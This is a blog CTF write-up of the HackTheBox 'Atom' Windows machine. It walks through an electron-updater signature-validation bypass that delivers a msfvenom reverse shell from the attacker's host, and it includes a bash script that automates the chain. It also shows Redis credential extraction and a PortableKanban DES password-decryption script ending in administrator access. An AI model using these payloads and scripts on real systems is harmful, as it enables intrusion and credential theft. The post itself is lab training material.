Month: April 2021

Protected: pg-nappa-private

This content is password protected. To view it please enter your password below:

Author Posted on

htb-atom-nl

Hackthebox Atom writeup

Introduction@Atom:~$

Column Details
Name Atom
IP 10.10.10.237
Points 30
Os Windows
Difficulty Medium
Creator MrR3boot
Out On 17 Apr 2021
Recon

Nmap

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ nmap -sC -sV -p- -oA nmap/result 10.10.10.237
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 19:49 CDT
Nmap scan report for 10.10.10.237
Host is up (0.23s latency).
Not shown: 65528 filtered ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Heed Solutions
135/tcp  open  msrpc        Microsoft Windows RPC
443/tcp  open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Heed Solutions
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
6379/tcp open  redis        Redis key-value store
7680/tcp open  pando-pub?
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m34s, deviation: 4h02m32s, median: 10m32s
| smb-os-discovery:
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-04-18T18:07:37-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-04-19T01:07:36
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 513.15 seconds

Let’s start with port-80

Port-80

There is a simple html page.

Port-80

Let’s check https 443 port.

Atom.htb

Same page on port 80 and 443 not so interesting.

Now let’s check with smbclient now.

┌─[puck@parrot-lt]─[~/htb/atom]
└──╼ $smbclient -L \\10.10.10.237 -U ""
Enter WORKGROUP\'s password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Software_Updates Disk 
SMB1 disabled -- no workgroup available
┌─[puck@parrot-lt]─[~/htb/atom]

We have a interesting share called Software_Updates let’s check what’s inside.

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ smbclient -N "\\\\10.10.10.237\Software_Updates"
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Apr 18 21:34:51 2021
  ..                                  D        0  Sun Apr 18 21:34:51 2021
  client1                             D        0  Sun Apr 18 21:34:51 2021
  client2                             D        0  Sun Apr 18 21:34:51 2021
  client3                             D        0  Sun Apr 18 21:34:51 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 06:18:08 2021

                4413951 blocks of size 4096. 1367010 blocks available
smb: \>

Inside folders there is nothing for us. but there is a pdf file. let get this real quick.

Atom.htb

smb: \> ls
  .                                   D        0  Sun Apr 18 21:34:51 2021
  ..                                  D        0  Sun Apr 18 21:34:51 2021
  client1                             D        0  Sun Apr 18 21:34:51 2021
  client2                             D        0  Sun Apr 18 21:34:51 2021
  client3                             D        0  Sun Apr 18 21:34:51 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 06:18:08 2021

                4413951 blocks of size 4096. 1366963 blocks available
smb: \> get UAT_Testing_Procedures.pdf 
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (28.9 KiloBytes/sec) (average 28.9 KiloBytes/sec)
smb: \> exit

Atom.htb

Atom.htb

After reading the pdf i known that we can place the update in any client folder and the automated script check the update.

So if we place the rev shell instead of update so we can get the reverse shell. but for that we need to bypass the "Signature Validation".

So i search the on google for electron-builder exploit and we got a good blog post.

Link : Signature Validation Bypass Leading to RCE In Electron-Updater

Atom.htb

Atom.htb

Atom.htb

After reading the blog i understand that how to bypass the Signature and get reverse shell.

I am using msfvenom for creating the reverse shell.

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.93 LPORT=9001 -f exe -o "r'dedsec.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: r'dedsec.exe
┌───[us-free-1]─[10.10.14.93]─[root@parrot]─[~/Desktop/HTB/Atom]
└──╼ [★]$ ls
 nmap   notes  "r'dedsec.exe"   UAT_Testing_Procedures.pdf
┌───[us-free-1]─[10.10.14.93]─[root@parrot]─[~/Desktop/HTB/Atom]
└──╼ [★]$ shasum -a 512 "r'dedsec.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0
rkCMdXcwO3trqGO7hKJvFOd3pYpSwgjKmhtMnnfxHa2hlXDwwanTUzaJUDnphf/8YjbsTQ96UOh0qmrq18PlkQ==
┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$

We got the hash now let’s start our msfconsole to catch the rev shell.

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ msfconsole
                                                   
# cowsay++
 ____________
 < metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v6.0.37-dev                          ]
+ -- --=[ 2111 exploits - 1136 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: When in a module, use back to go 
back to the top level prompt

msf6 > 
msf6 > use exploit/multi/handler                                                                
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp                       
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.93                                             
LHOST => 10.10.14.93
msf6 exploit(multi/handler) > set lport 9001                                                    
lport => 9001
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.93:9001

Now we need to create a file called latest.yml and add our hash inside this file.

latest.yml

version: 1.2.3
path: http://10.10.14.93/r'dedsec.exe
sha512: rkCMdXcwO3trqGO7hKJvFOd3pYpSwgjKmhtMnnfxHa2hlXDwwanTUzaJUDnphf/8YjbsTQ96UOh0qmrq18PlkQ==

My file look like this.

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ cat latest.yml 
version: 1.2.3
path: http://10.10.14.93/r'dedsec.exe
sha512: rkCMdXcwO3trqGO7hKJvFOd3pYpSwgjKmhtMnnfxHa2hlXDwwanTUzaJUDnphf/8YjbsTQ96UOh0qmrq18PlkQ==

Now start your python3 server on port 80 and we good to go.

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Now last thing you want to do is put the file inside client2 or client1 folder it’s your choice.

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ smbclient //10.10.10.237/Software_Updates/ -U " "
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Apr 18 21:34:51 2021
  ..                                  D        0  Sun Apr 18 21:34:51 2021
  client1                             D        0  Sun Apr 18 21:34:51 2021
  client2                             D        0  Sun Apr 18 21:34:51 2021
  client3                             D        0  Sun Apr 18 21:34:51 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 06:18:08 2021
smb: \> cd client2
smb: \client2\> put latest.yml

After putting file wait for 10sec and you get the reverse shell in metasploit.

Atom.htb

Boom we got the shell.

I will also share a bash script for automate the work for getting the rev shell.

dedsec.sh

IP=`ifconfig tun0| grep -w inet | awk '{print $2}'`
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=9001 -f exe -o "r'dedsec.exe"
KEY=`shasum -a 512 "r's.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0`
cat <<EOF >> latest.yml
version: 1.2.3
path: http://$IP/r'dedsec.exe
sha512: $KEY
EOF
smbclient //10.10.10.237/Software_Updates/  -U " "%" "  -c "cd client2;put latest.yml"
python3 -m http.server 80

Now let’s get our user.txt file.

meterpreter > shell
Process 5088 created.
Channel 2 created.
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd \Users\jason\Desktop
cd \Users\jason\Desktop

C:\Users\jason\Desktop>type user.txt
type user.txt
a55daabe6ad164f79226c8da2f2ac0f4

C:\Users\jason\Desktop>

Privilege escalation

let’s run winPEAS.

Link : winPEASx64.exe

Atom.htb

Atom.htb

After running winPEAS i got two interesting things first a file called redis.windows-service.conf and second a service is running called redis-server.

First let’s get the file and see what’s inside.

Atom.htb

I found a password -> kidvscat_yes_kidvscat

And with this password we can connect with redis-server.

But first if you don’t have redis-cli so install that with this command.

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ apt-get install redis-tools
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
redis-tools is already the newest version (5:6.0.11-1).
The following packages were automatically installed and are no longer required:
  ace-voip arachni atftpd axel cdpsnarf cgdb cgpt cookie-cadger crackmapexec cryptsetup-nuke-password curlftpfs dotdotpwn dwarfdump exe2hexbat expect flasm freeradius freeradius-common
  freeradius-config freeradius-utils ftp galera-3 gir1.2-appindicator3-0.1 golang-1.14 golang-1.14-doc golang-1.14-go golang-1.14-src httprint httrack ident-user-enum ifenslave jsql kayak
  libarmadillo9 libasync-mergepoint-perl libbasicusageenvironment1 libboost-chrono1.71.0 libboost-date-time1.71.0 libboost-filesystem1.71.0 libboost-iostreams1.71.0 libboost-locale1.71.0
  libboost-program-options1.71.0 libboost-regex1.71.0 libboost-serialization1.71.0 libboost-test1.71.0 libboost-thread1.71.0 libbotan-2-12 libcapstone3 libcdio18 libcfitsio8
  libclass-load-perl libclass-load-xs-perl libclass-tiny-perl libcollectdclient1 libconfig-inifiles-perl libcroco3 libdap25 libdbd-mariadb-perl libdc1394-22 libdevel-globaldestruction-perl
  libdevel-overloadinfo-perl libdevel-partialdump-perl libdist-checkconflicts-perl libdistorm3-3 libdwarf1 libfam0 libfreeradius3 libfuture-perl libgdal27 libgeos-3.8.1 libgit2-28
  libgroupsock8 libgvm11 libhivex-bin libhivex0 libhtml-template-perl libhttrack2 libilmbase24 libio-async-loop-epoll-perl libio-async-perl libisl22 libjs-sizzle liblinux-epoll-perl
  liblivemedia77 libmdb2 libmdbsql2 libmetrics-any-perl libmodule-runtime-conflicts-perl libmoose-perl libndpi2.6 libnet-ident-perl libnet-tftp-perl libobjc-9-dev libopenexr24
  liborcus-0.15-0 liborcus-parser-0.15-0 libpackage-deprecationmanager-perl libperl5.30 libpgm-5.2-0 libplacebo29 libplymouth4 libpoppler82 libpython2.7 libpython3.8 libpython3.8-dev
  libpython3.8-minimal libpython3.8-stdlib libradare2-4.3.1 libraw19 libreadline5 libsane libsereal-perl libsnmp35 libstd-rust-1.45 libstruct-dumb-perl libtest-metrics-any-perl
  libtest-refcount-perl libtsk13 libusageenvironment3 libusrsctp1 libwireshark13 libwiretap10 libwsutil11 libxcb-util0 libyara3 mariadb-client-10.3 mariadb-client-core-10.3 memdump msfpc
  ncurses-hexedit netwag netwox nipper-ng node-jquery oclgausscrack parrot-meta-all parrot-meta-automotive parrot-meta-forensics parrot-meta-full parrot-meta-gpu parrot-meta-pwtools
  parrot-meta-rfid parrot-meta-voip parrot-meta-web parrot-meta-wireless perl-tk php php-mysql php-pgsql php7.4 php7.4-mysql php7.4-pgsql python-attr python-cairo python-capstone
  python-certifi python-contextlib2 python-crypto python-faraday python-gevent python-gobject-2 python-greenlet python-html5lib python-idna python-ipaddress python-libxml2 python-libxslt1
  python-lxml python-numpy python-olefile python-packaging python-pil python-pkg-resources python-py python-pyparsing python-six python-urllib3 python-wcwidth python-webencodings
  python-yara python3-acora python3-aiocmd python3-aioconsole python3-aiowinreg python3-arrow python3-artifacts python3-asciitree python3-asysocks python3-chameleon python3-crcelk
  python3-crypto python3-expiringdict python3-flask-restless python3-grequests python3-icu python3-intervaltree python3-isodate python3-lsassy python3-mimeparse python3-mimerender
  python3-minidump python3-minikerberos python3-msldap python3-neo4j python3-neobolt python3-neotime python3-ntlm-auth python3-parsedatetime python3-pyaes python3-pyaff4 python3-pyelftools
  python3-pylnk python3-pypsrp python3-pypykatz python3-pywerview python3-rdflib python3-rekall-core python3-rekall-lib python3-requests-ntlm python3-sparqlwrapper python3-spnego
  python3-tsk python3-waitress python3-webtest python3-winacl python3-xmltodict python3-zope.component python3-zope.hookable python3.8 python3.8-dev python3.8-minimal redshift redshift-gtk
  redsocks ruby-arel ruby-chunky-png ruby-connection-pool ruby-molinillo ruby-net-http-persistent ruby-rqrcode ruby-thor sakis3g sendemail suckless-tools tcl-expect teamsploit termineter
  tftp tftpd32 tnscmd10g uniscan vboot-kernel-utils vboot-utils volatility-tools webscarab xtightvncviewer
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 145 not upgraded.
┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$

And here is the cheatsheet of redis-cli commands.

Link : redis_cheatsheet

Now let’s connect with server.

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379>

Let’s list the keys.

10.10.10.237:6379> keys *
1) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
2) "pk:ids:User"
3) "pk:ids:MetaDataClass"
4) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
10.10.10.237:6379>

Now let’s go with first user becuase first is always admin.

10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
10.10.10.237:6379>

Atom.htb

We got the hash -> Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi

Now the question is how to crack or decrypt this hash.

I again check the winPEAS result and i found something good.

Atom.htb

I download the pdf and read the pdf.

Atom.htb

Atom.htb

After reading this i understand that portable-kanban stores all the setting and Encrypted Password.

Let’s search on google for any exploit for portable kanban.

Atom.htb

Link : PortableKanban Encrypted Password Disclosure

Link : Python3 Script

Found a python3 script for Encrypted Password Disclosure.

With the help of this script i can decrypt the hash.

But the problem is the script require the file called PortableKanban.pk3 so i modify the script for our usecase.

decrypt.py

import json
import base64
from des import * #python3 -m pip install des

try:
    hash = str(input("Enter the Hash : "))
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    print("Decrypted Password : " + key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8'))
except:
    print("Wrong Hash")

Before running the script install the req for that with this command.

pip3 install des

Now we are ready to decrypt the hash.

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ python3 decrypt.py 
Enter the Hash : Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
Decrypted Password : kidvscat_admin_@123
┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$

And we got the password of Administrator -> kidvscat_admin_@123

Now let’s login with evil-winrm.

┌───[us-free-1][10.10.14.93][root@parrot][~/Desktop/HTB/Atom]
└──╼ []$ evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'                

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
atom\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
165a44d7b3352f23de47513bc5337dea

And we pwned it …….

 

If u liked the writeup.Support a Student to Get the OSCP-Cert Donation for OSCP

Resources

Topic Url
Signature Validation Bypass https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
winPEASx64.exe https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite……
redis_cheatsheet https://gist.github.com/LeCoupa/1596b8f359ad8812c7271b5322c30946
PortableKanban Encrypted Password Disclosure https://www.torchsec.net/portablekanban-4-3-6578-38136-encrypted-password-disclosure-torchsec/
Python3 Script https://dl.packetstormsecurity.net/2101-exploits/pk43657838136-disclose.txt
This post is licensed 
Hash : 7df7256dc47d2125d825058b2f89ff38
.

Protected: pg-nukem-private

This content is password protected. To view it please enter your password below:

Author Posted on